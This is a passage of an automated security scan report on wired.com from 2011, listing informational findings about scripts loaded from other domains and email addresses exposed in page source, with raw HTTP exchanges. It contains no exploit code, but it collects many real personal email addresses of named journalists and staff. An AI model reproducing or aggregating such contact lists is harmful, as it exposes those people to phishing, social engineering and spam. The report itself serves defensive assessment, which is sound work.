<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.182. http://www.wired.com/video/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/video/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/APIModules_all.js
http://admin.brightcove.com/js/BrightcoveExperiences.js
http://w.sharethis.com/widget/?tabs=web%2Cemail&charset=utf-8&services=facebook%2Cmyspace%2Cdelicious%2Ctechnorati%2Cpropeller%2Cmixx%2Cnewsvine%2Cgoogle_bmarks%2Cyahoo_myweb%2Cwindows_live%2Ctailrank%2Cmagnolia%2Cfurl%2Cblinklist%2Cblogmarks&amp style=default&publisher=0ec71848-688b-4d92-957d-d8ba67ad2647&headerbg=%23e7e7e7&inactivebg=%23f1f1f1&inactivefg=%237e7e7e&linkfg=%23007ca5
http://www.google-analytics.com/urchin.js

Request

GET /video/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private, max-age=266
Expires: Wed, 12 Jan 2011 05:09:34 GMT
Date: Wed, 12 Jan 2011 05:05:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107714

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
</div>

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/APIModules_all.js"></script>
...[SNIP]...
<div class='bc_shareThisContainer'>
<script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cemail&charset=utf-8&services=facebook%2Cmyspace%2Cdelicious%2Ctechnorati%2Cpropeller%2Cmixx%2Cnewsvine%2Cgoogle_bmarks%2Cyahoo_myweb%2Cwindows_live%2Ctailrank%2Cmagnolia%2Cfurl%2Cblinklist%2Cblogmarks&amp style=default&publisher=0ec71848-688b-4d92-957d-d8ba67ad2647&headerbg=%23e7e7e7&inactivebg=%23f1f1f1&inactivefg=%237e7e7e&linkfg=%23007ca5"></script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

6.183. http://www.wired.com/video/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/video/search/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/APIModules_all.js
http://admin.brightcove.com/js/BrightcoveExperiences.js
http://w.sharethis.com/widget/?tabs=web%2Cemail&charset=utf-8&services=facebook%2Cmyspace%2Cdelicious%2Ctechnorati%2Cpropeller%2Cmixx%2Cnewsvine%2Cgoogle_bmarks%2Cyahoo_myweb%2Cwindows_live%2Ctailrank%2Cmagnolia%2Cfurl%2Cblinklist%2Cblogmarks&amp style=default&publisher=0ec71848-688b-4d92-957d-d8ba67ad2647&headerbg=%23e7e7e7&inactivebg=%23f1f1f1&inactivefg=%237e7e7e&linkfg=%23007ca5
http://www.google-analytics.com/urchin.js

Request

GET /video/search/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private, max-age=285
Expires: Wed, 12 Jan 2011 05:10:01 GMT
Date: Wed, 12 Jan 2011 05:05:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
</div>

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/APIModules_all.js"></script>
...[SNIP]...
<div class='bc_shareThisContainer'>
<script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cemail&charset=utf-8&services=facebook%2Cmyspace%2Cdelicious%2Ctechnorati%2Cpropeller%2Cmixx%2Cnewsvine%2Cgoogle_bmarks%2Cyahoo_myweb%2Cwindows_live%2Ctailrank%2Cmagnolia%2Cfurl%2Cblinklist%2Cblogmarks&amp style=default&publisher=0ec71848-688b-4d92-957d-d8ba67ad2647&headerbg=%23e7e7e7&inactivebg=%23f1f1f1&inactivefg=%237e7e7e&linkfg=%23007ca5"></script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

6.184. http://www.wired.com/wiredscience/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/wiredscience/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://www.google-analytics.com/urchin.js

Request

GET /wiredscience/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 04:27:14 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=305
Expires: Wed, 12 Jan 2011 05:10:25 GMT
Date: Wed, 12 Jan 2011 05:05:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 102705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

7. Email addresses disclosed previous next
There are 128 instances of this issue:

/about/faq/
/about/press/
/about/privacy-policy/
/about/user-agreement/
/autopia/
/autopia/2011/01/study-renewable-fuel-mandate-cant-be-met-with-ethanol/
/dangerroom/
/dangerroom/2011/01/china-is-loving-u-s-s-stealth-jet-missile-freakouts/
/epicenter/
/epicenter/2011/01/amazon-prepares-to-take-on-illinois-in-sales-tax-dispute/
/epicenter/2011/01/metropcs-net-neutrality/
/gadgetlab/
/gamelife/
/geekdad/
/geekdad/2011/01/beans-soda-same-difference-a-jelly-belly-experiment/
/js/videos/MobileCompatibility.js
/magazine/decode/
/playbook/
/rawfile/
/thisdayintech/
/threatlevel/
/threatlevel/2006/04/reporter_vs_sub/
/threatlevel/2010/12/hacking-the-hacker-stereotypes/
/threatlevel/2010/12/transcending-the-human-diy-style/
/threatlevel/2010/12/wiki-style-mapping-heads-to-sea/
/threatlevel/2011/01/birgitta-jonsdottir/
/threatlevel/2011/01/codebreakers-death/
/threatlevel/2011/01/dubai-assassination/
/threatlevel/2011/01/secret-tanning-camera/
/threatlevel/2011/01/vf-wikieaks/
/threatlevel/2011/01/video-poker/
/threatlevel/2011/01/wikileaks-sunken-treasure/
/threatlevel/2011/01/wikileaks-sunken-treasure/&hl=en&client=ca-pub-9817987453265044&adU=Verizon.com&adT=Verizon+Internet+-+%2419.99&adU=www.Brocade.com&adT=Ethernet+Fabrics&adU=www.Comcast.com&adT=Comcast%C2%AE+High+Speed&adU=www.google.com/nexus&adT=The+New+Google+Nexus+S&gl=US/x26usg/x3dAFQjCNGTF4DW2TDGEnchvTvU-Xc_zM5wgQ
/threatlevel/2011/01/wikileaks-sunken-treasure/&t=WikiLeaks%20Cables%20Cited%20in%20Lawsuit%20Over%20$500%20Million%20Sunken%20Treasure
/threatlevel/author/kimzetter/
/threatlevel/category/announcements/
/threatlevel/category/atm-hacking/
/threatlevel/category/bittorrent/
/threatlevel/category/black-hat-conference/
/threatlevel/category/bradley-manning/
/threatlevel/category/breaches/
/threatlevel/category/censorship/
/threatlevel/category/chaos-computer-club/
/threatlevel/category/conferences/
/threatlevel/category/copyrights-and-patents/
/threatlevel/category/coverups/
/threatlevel/category/crime/
/threatlevel/category/crypto/
/threatlevel/category/cybarmageddon/
/threatlevel/category/cyber-warfare/
/threatlevel/category/cyberbullying/
/threatlevel/category/cybersecurity/
/threatlevel/category/defcon/
/threatlevel/category/digital-millennium-copyright-act/
/threatlevel/category/e-voting/
/threatlevel/category/elections/
/threatlevel/category/fed-blotter/
/threatlevel/category/glitches-and-bugs/
/threatlevel/category/hacks-and-cracks/
/threatlevel/category/hans-reiser-trial/
/threatlevel/category/identification/
/threatlevel/category/intellectual-property/
/threatlevel/category/lori-drew-trial/
/threatlevel/category/network-neutrality/
/threatlevel/category/nsa/
/threatlevel/category/openleaks/
/threatlevel/category/politics/
/threatlevel/category/porn/
/threatlevel/category/privacy/
/threatlevel/category/rfid/
/threatlevel/category/riaa-litigation/
/threatlevel/category/rsa-conference/
/threatlevel/category/sexting/
/threatlevel/category/spooks-gone-wild/
/threatlevel/category/stuxnet/
/threatlevel/category/sunshine-and-secrecy/
/threatlevel/category/surveillance/
/threatlevel/category/the-courts/
/threatlevel/category/the-ridiculous/
/threatlevel/category/threats/
/threatlevel/category/three-strikes/
/threatlevel/category/tsa/
/threatlevel/category/uncategorized/
/threatlevel/category/watchlists/
/threatlevel/category/wikileaks/
/threatlevel/category/yo-ho-ho/
/threatlevel/tag/4chan/
/threatlevel/tag/aclu/
/threatlevel/tag/al-haramain/
/threatlevel/tag/albert-gonzalez/
/threatlevel/tag/apple-iphone/
/threatlevel/tag/blackhat/
/threatlevel/tag/bradley-manning/
/threatlevel/tag/carding/
/threatlevel/tag/ccc/
/threatlevel/tag/censorship/
/threatlevel/tag/china/
/threatlevel/tag/copyright/
/threatlevel/tag/crime/
/threatlevel/tag/defcon/
/threatlevel/tag/dmca/
/threatlevel/tag/facebook/
/threatlevel/tag/fbi/
/threatlevel/tag/file-sharing/
/threatlevel/tag/first-amendment/
/threatlevel/tag/google/
/threatlevel/tag/hack/
/threatlevel/tag/hacking/
/threatlevel/tag/intellectual-property/
/threatlevel/tag/mpaa/
/threatlevel/tag/nsa/
/threatlevel/tag/obama/
/threatlevel/tag/piracy/
/threatlevel/tag/pirate-bay-trial/
/threatlevel/tag/pirate-bay/
/threatlevel/tag/politics/
/threatlevel/tag/privacy/
/threatlevel/tag/riaa/
/threatlevel/tag/segvec/
/threatlevel/tag/supreme-court/
/threatlevel/tag/surveillance/
/threatlevel/tag/tjx/
/threatlevel/tag/tsa/
/threatlevel/tag/twitter/
/threatlevel/tag/virginia-tech-shootings/
/threatlevel/tag/wikileaks/
/underwire/
/wiredscience/

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

7.1. http://www.wired.com/about/faq/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/about/faq/

Issue detail

The following email addresses were disclosed in the response:

kathrina_manalac@wired.com
louise_knapp@condenast.com
reprints@wiredmag.com
subscriptions@wiredmag.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:08:37 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:48:34 GMT
Date: Wed, 12 Jan 2011 15:40:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="mailto:subscriptions@wiredmag.com">subscriptions@wiredmag.com</a>
...[SNIP]...
<a href="mailto:subscriptions@wiredmag.com">subscriptions@wiredmag.com</a>
...[SNIP]...
<a href="mailto:louise_knapp@condenast.com">
...[SNIP]...
<a href="mailto:reprints@wiredmag.com">reprints@wiredmag.com</a>
...[SNIP]...
<a href="mailto:kathrina_manalac@wired.com">
...[SNIP]...

7.2. http://www.wired.com/about/press/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/about/press/

Issue detail

The following email addresses were disclosed in the response:

Rachel_millner@condenast.com
samantha_rosenthal@condenast.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:08:49 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=446
Expires: Wed, 12 Jan 2011 15:48:03 GMT
Date: Wed, 12 Jan 2011 15:40:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="mailto:samantha_rosenthal@condenast.com">samantha_rosenthal@condenast.com</a>
...[SNIP]...
<a href="mailto:Rachel_millner@condenast.com">Rachel_millner@condenast.com</a>
...[SNIP]...

7.3. http://www.wired.com/about/privacy-policy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/about/privacy-policy/

Issue detail

The following email address was disclosed in the response:

Privacy_administration@condenast.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:45:55 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=438
Expires: Wed, 12 Jan 2011 15:48:09 GMT
Date: Wed, 12 Jan 2011 15:40:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="mailto:Privacy_administration@condenast.com">Privacy_administration@condenast.com</a>
...[SNIP]...

7.4. http://www.wired.com/about/user-agreement/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/about/user-agreement/

Issue detail

The following email addresses were disclosed in the response:

copyright@sbandg.com
privacy@condenast.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:09:15 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=462
Expires: Wed, 12 Jan 2011 15:48:30 GMT
Date: Wed, 12 Jan 2011 15:40:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<br/>E-mail: copyright@sbandg.com</td>
...[SNIP]...
<a href="mailto:privacy@condenast.com">privacy@condenast.com</a>
...[SNIP]...

7.5. http://www.wired.com/autopia/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/autopia/

Issue detail

The following email addresses were disclosed in the response:

Jkambitsis.wired@gmail.com
chuck_squatriglia@wired.com
darryl_siry@wired.com
davedemerjian@gmail.com
keith.barry@gmail.com
michael_calore@wired.com
paurjason@gmail.com
tips@jalopnik.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:33:06 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=383
Expires: Wed, 12 Jan 2011 15:44:57 GMT
Date: Wed, 12 Jan 2011 15:38:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:michael_calore@wired.com">
...[SNIP]...
<a href="mailto:chuck_squatriglia@wired.com">
...[SNIP]...
<a href="mailto:paurjason@gmail.com">
...[SNIP]...
<a href="mailto:chuck_squatriglia@wired.com">
...[SNIP]...
<a href="mailto:tips@jalopnik.com">
...[SNIP]...
<a href="mailto:chuck_squatriglia@wired.com">
...[SNIP]...
<a href="mailto:chuck_squatriglia@wired.com">
...[SNIP]...
<a href="mailto:chuck_squatriglia@wired.com">
...[SNIP]...
<a href="mailto:keith.barry@gmail.com">
...[SNIP]...
<a href="mailto:tips@jalopnik.com">
...[SNIP]...
<a href="mailto:chuck_squatriglia@wired.com">
...[SNIP]...
<a href="mailto:keith.barry@gmail.com">
...[SNIP]...
<a href="mailto:paurjason@gmail.com">
...[SNIP]...
<a href="mailto: Jkambitsis.wired@gmail.com">
...[SNIP]...
<a href="mailto: davedemerjian@gmail.com">
...[SNIP]...
<a href="mailto: darryl_siry@wired.com">
...[SNIP]...
<a href="mailto:chuck_squatriglia@wired.com">
...[SNIP]...

7.6. http://www.wired.com/autopia/2011/01/study-renewable-fuel-mandate-cant-be-met-with-ethanol/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/autopia/2011/01/study-renewable-fuel-mandate-cant-be-met-with-ethanol/

Issue detail

The following email addresses were disclosed in the response:

Jkambitsis.wired@gmail.com
chuck_squatriglia@wired.com
darryl_siry@wired.com
davedemerjian@gmail.com
jtimmer@arstechnica.com
keith.barry@gmail.com
paurjason@gmail.com

Request

Response

7.7. http://www.wired.com/dangerroom/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/dangerroom/

Issue detail

The following email addresses were disclosed in the response:

ArmsControlWonk@gmail.com
armchairgeneralist@yahoo.com
d_hambling@hotmail.com
danger_room@wired.com
david_axe@hotmail.com
katiedrumm@gmail.com
kris.alexander@gmail.com
michael.peck1@gmail.com
michael.tanji@threatswatch.org
nick@nickthompson.com
nohodge@gmail.com
sharonweinberger@gmail.com
spencerackerman@gmail.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/dangerroom/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:38:00 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=420
Expires: Wed, 12 Jan 2011 15:45:49 GMT
Date: Wed, 12 Jan 2011 15:38:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126060

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:david_axe@hotmail.com">
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:david_axe@hotmail.com">
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:danger_room@wired.com">
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:katiedrumm@gmail.com">
...[SNIP]...
<a href="mailto:nohodge@gmail.com">
...[SNIP]...
<a href="mailto:sharonweinberger@gmail.com">
...[SNIP]...
<a href="mailto:david_axe@hotmail.com">
...[SNIP]...
<a href="mailto:d_hambling@hotmail.com">
...[SNIP]...
<a href="mailto:nick@nickthompson.com">
...[SNIP]...
<a href="mailto:ArmsControlWonk@gmail.com">
...[SNIP]...
<a href="mailto:armchairgeneralist@yahoo.com">
...[SNIP]...
<a href="mailto:kris.alexander@gmail.com">
...[SNIP]...
<a href="mailto:michael.tanji@threatswatch.org">
...[SNIP]...
<a href="mailto:michael.peck1@gmail.com">
...[SNIP]...

7.8. http://www.wired.com/dangerroom/2011/01/china-is-loving-u-s-s-stealth-jet-missile-freakouts/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/dangerroom/2011/01/china-is-loving-u-s-s-stealth-jet-missile-freakouts/

Issue detail

The following email addresses were disclosed in the response:

ArmsControlWonk@gmail.com
armchairgeneralist@yahoo.com
d_hambling@hotmail.com
danger_room@wired.com
david_axe@hotmail.com
katiedrumm@gmail.com
kris.alexander@gmail.com
michael.peck1@gmail.com
michael.tanji@threatswatch.org
nick@nickthompson.com
nohodge@gmail.com
sharonweinberger@gmail.com
spencerackerman@gmail.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 09:44:19 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=427
Expires: Wed, 12 Jan 2011 15:46:00 GMT
Date: Wed, 12 Jan 2011 15:38:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:danger_room@wired.com">
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:katiedrumm@gmail.com">
...[SNIP]...
<a href="mailto:nohodge@gmail.com">
...[SNIP]...
<a href="mailto:sharonweinberger@gmail.com">
...[SNIP]...
<a href="mailto:david_axe@hotmail.com">
...[SNIP]...
<a href="mailto:d_hambling@hotmail.com">
...[SNIP]...
<a href="mailto:nick@nickthompson.com">
...[SNIP]...
<a href="mailto:ArmsControlWonk@gmail.com">
...[SNIP]...
<a href="mailto:armchairgeneralist@yahoo.com">
...[SNIP]...
<a href="mailto:kris.alexander@gmail.com">
...[SNIP]...
<a href="mailto:michael.tanji@threatswatch.org">
...[SNIP]...
<a href="mailto:michael.peck1@gmail.com">
...[SNIP]...

7.9. http://www.wired.com/epicenter/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/epicenter/

Issue detail

The following email addresses were disclosed in the response:

Fred_Vogelstein@wired.com
OliviaSolon@johnabell.com
frank_rose@wired.com
jabell@wired.com
jeff_howe@wired.com
nynews@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
ryanpaul@johnabell.com
shgustin@gmail.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:48:52 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=469
Expires: Wed, 12 Jan 2011 15:46:57 GMT
Date: Wed, 12 Jan 2011 15:39:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 140685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:OliviaSolon@johnabell.com">
...[SNIP]...
<a href="mailto:ryanpaul@johnabell.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:OliviaSolon@johnabell.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:jabell@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:jabell@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:Fred_Vogelstein@wired.com">
...[SNIP]...
<a href="mailto:frank_rose@wired.com">
...[SNIP]...
<a href="mailto:jeff_howe@wired.com">
...[SNIP]...
<a href="mailto:nynews@wired.com?subject=Comment from Epicenter Page:">
...[SNIP]...

7.10. http://www.wired.com/epicenter/2011/01/amazon-prepares-to-take-on-illinois-in-sales-tax-dispute/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/epicenter/2011/01/amazon-prepares-to-take-on-illinois-in-sales-tax-dispute/

Issue detail

The following email addresses were disclosed in the response:

Fred_Vogelstein@wired.com
frank_rose@wired.com
jabell@wired.com
jeff_howe@wired.com
nynews@wired.com
ryan_singel@wired.com
shgustin@gmail.com

Request

Response

7.11. http://www.wired.com/epicenter/2011/01/metropcs-net-neutrality/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/epicenter/2011/01/metropcs-net-neutrality/

Issue detail

The following email addresses were disclosed in the response:

Fred_Vogelstein@wired.com
frank_rose@wired.com
jabell@wired.com
jeff_howe@wired.com
nynews@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com

Request

Response

7.12. http://www.wired.com/gadgetlab/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/gadgetlab/

Issue detail

The following email addresses were disclosed in the response:

brian_chen@wired.com
gadgetnews@wired.com
mike@wired.com
mike_isaac@wired.com
mjisaac@gmail.com
wired@mistercharlie.co.uk
wired@tweney.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:39:06 +0000
Content-Type: text/html;charset=UTF-8
